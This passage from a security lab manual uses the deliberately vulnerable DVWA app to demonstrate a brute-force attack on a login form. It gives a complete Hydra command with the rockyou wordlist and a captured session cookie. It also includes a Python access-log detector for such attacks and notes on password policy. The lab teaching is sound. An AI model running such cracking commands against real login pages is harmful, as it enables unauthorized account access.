?page=httP://imdb.com

Difficulty: HIGH

We can't exploit the High difficulty using RFI. As you can see in the source page, the target web
server is only accepting "include.php" or anything starting with the word "file", which is why we can't
include anything from an outside server.


Experiment 10
Objective: Use DVWA to simulate login pages and demonstrate brute-force and dictionary attacks against
weak passwords. Emphasize the importance of strong password policies.

Modern brute force attacks can now crack an 8-character alphanumeric password in a mere 2 hours, while
more advanced encryption hashes can be cracked in a few months. This is achieved by an exhaustive key
search, in which the computer tries every possible combination of every possible character until it finds the
combination that is the password. For the purpose of this demonstration, we will set up the Damn
Vulnerable Web Application (DVWA) to simulate a brute force attack.
The attack will use Hydra as a parallelized login cracker together with the ‘rockyou.txt’ wordlist, and will be
demonstrated on the login form below.

Initially, barely any information is disclosed. However, a reasonable guess is to use one of the most
popular usernames on any web application, which is “admin”. Before proceeding with the attack, we must
first collect more information. Open the Burp Suite browser and direct it to the DVWA page, which will look
exactly like the one in a regular browser. Now, try logging in using a random password. For this attempt, the

username “admin” and password “admin123” were used. For Burp Suite to see the request to the web
application, turn on Intercept mode right before clicking the “Login” button.

As expected, the credentials entered were wrong, displaying an error message saying, “Username and/or
password incorrect”. Now, head back to Burp Suite and view the raw data of the connection request.

From this we have gathered more information that may be useful (e.g., the session cookie and the
parameters of the request). The following table lists all the gathered information:


The next step is to use Hydra to crack the account password. There is no fixed format for Hydra’s command,
as it depends on the elements and information known to the pentester (e.g., username, hostname, URL,
service, and cookies). Considering the list of disclosed information and the parameters obtained during the
vulnerability assessment step with Burp Suite, the command used for this demonstration is:

hydra 127.0.0.1 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form \
  "/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=9cei1q7s10h39gdp538to6f3ut;security=low:F=Username and/or password incorrect."

Here -l fixes the username, -P supplies the wordlist, H= sends the captured session cookie with every request,
and F= is the text Hydra looks for in a failed response (the error message seen earlier). With all the elements
from the table incorporated, Hydra will systematically attempt the passwords from the ‘rockyou.txt’
wordlist in order to crack the password for the “admin” account.


The result of the attack reveals the password to be “password”, and logging in with it succeeds.
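Detection logic for the pattern this attack leaves in the web server’s access log, as an added example for this manual (not DVWA or Hydra code): the sample log lines are constructed, and the threshold and time window are assumptions.

```python
"""Flag login brute forcing in web-server access logs.

Added example for this manual, not DVWA or Hydra code. The log lines are
constructed to resemble the GET-form login requests sent in the experiment.
DVWA answers a failed login with HTTP 200 plus an error message (the F= text
Hydra matches on), so the detection counts distinct passwords per source and
user instead of relying on status codes. Threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/dvwa/vulnerabilities/brute"  # login form targeted above
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) ')


def parse_login_attempt(line):
    """Return (ip, timestamp, username, password) for a login request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if url.path.rstrip("/") != LOGIN_PATH:
        return None
    qs = parse_qs(url.query)
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, qs.get("username", [""])[0], qs.get("password", [""])[0]


def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Map (ip, user) -> most distinct passwords tried inside `window`, for pairs
    that reach `threshold`; a legitimate user rarely needs that many guesses."""
    tries = defaultdict(list)
    for line in lines:
        ev = parse_login_attempt(line)
        if ev:
            ip, ts, user, pw = ev
            tries[(ip, user)].append((ts, pw))
    flagged = {}
    for key, evs in tries.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            distinct = {pw for ts, pw in evs[i:] if ts - start <= window}
            if len(distinct) >= threshold:
                flagged[key] = max(flagged.get(key, 0), len(distinct))
    return flagged


# Constructed sample: one source walks a wordlist against "admin" within
# seconds, another logs in once with the correct password.
SAMPLE_LOG = [
    f'10.0.0.5 - - [10/Mar/2024:10:00:{s:02d} +0000] "GET {LOGIN_PATH}/'
    f'?username=admin&password={pw}&Login=Login HTTP/1.1" 200 4321'
    for s, pw in enumerate(["123456", "12345", "qwerty", "letmein", "abc123", "password"])
] + [f'10.0.0.9 - - [10/Mar/2024:10:05:00 +0000] "GET {LOGIN_PATH}/'
     '?username=admin&password=password&Login=Login HTTP/1.1" 200 4321']
```

Running find_bruteforce(SAMPLE_LOG) flags only the first source, with 6 distinct passwords tried in one window.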

Importance of Strong Passwords:

Strong password policies are the cornerstone of digital security, acting as the first line of defense against
unauthorized access and cyber threats. Here's why they're crucial:
Protection Against Unauthorized Access: Strong passwords make it significantly harder for hackers to
gain access to your accounts, systems, and sensitive information. They act as a barrier, keeping intruders out
of your digital domain.
Prevention of Data Breaches: Weak passwords are like an open invitation for cybercriminals to exploit. By
enforcing strong password policies, organizations can mitigate the risk of data breaches, safeguarding both
their own proprietary information and the personal data of their customers.
Defense Against Brute Force Attacks: Hackers often use automated tools to systematically try different
combinations of characters until they crack a password. Strong passwords with a mix of letters, numbers,
and symbols exponentially increase the time and effort required to break into an account, deterring brute
force attacks.
Enhanced Security Culture: Implementing robust password policies fosters a culture of security within an
organization. It encourages employees and users to prioritize cybersecurity and take proactive measures to
protect their accounts and data.
Compliance with Regulations: Many industries are subject to strict regulations governing data protection
and privacy. Strong password policies are often a fundamental requirement for compliance with these
regulations, helping organizations avoid hefty fines and legal consequences.
Protection Beyond Passwords: In addition to strong passwords, enforcing other security measures like
multi-factor authentication (MFA) further bolsters defenses against unauthorized access. These additional
layers of security provide an added level of assurance, especially in the event that passwords are
compromised.
Mitigation of Insider Threats: Strong password policies not only guard against external threats but also
help mitigate the risk of insider threats. Employees with malicious intent or those who inadvertently
compromise their credentials pose a significant risk to an organization's security. Strong passwords add an
extra barrier against such threats.
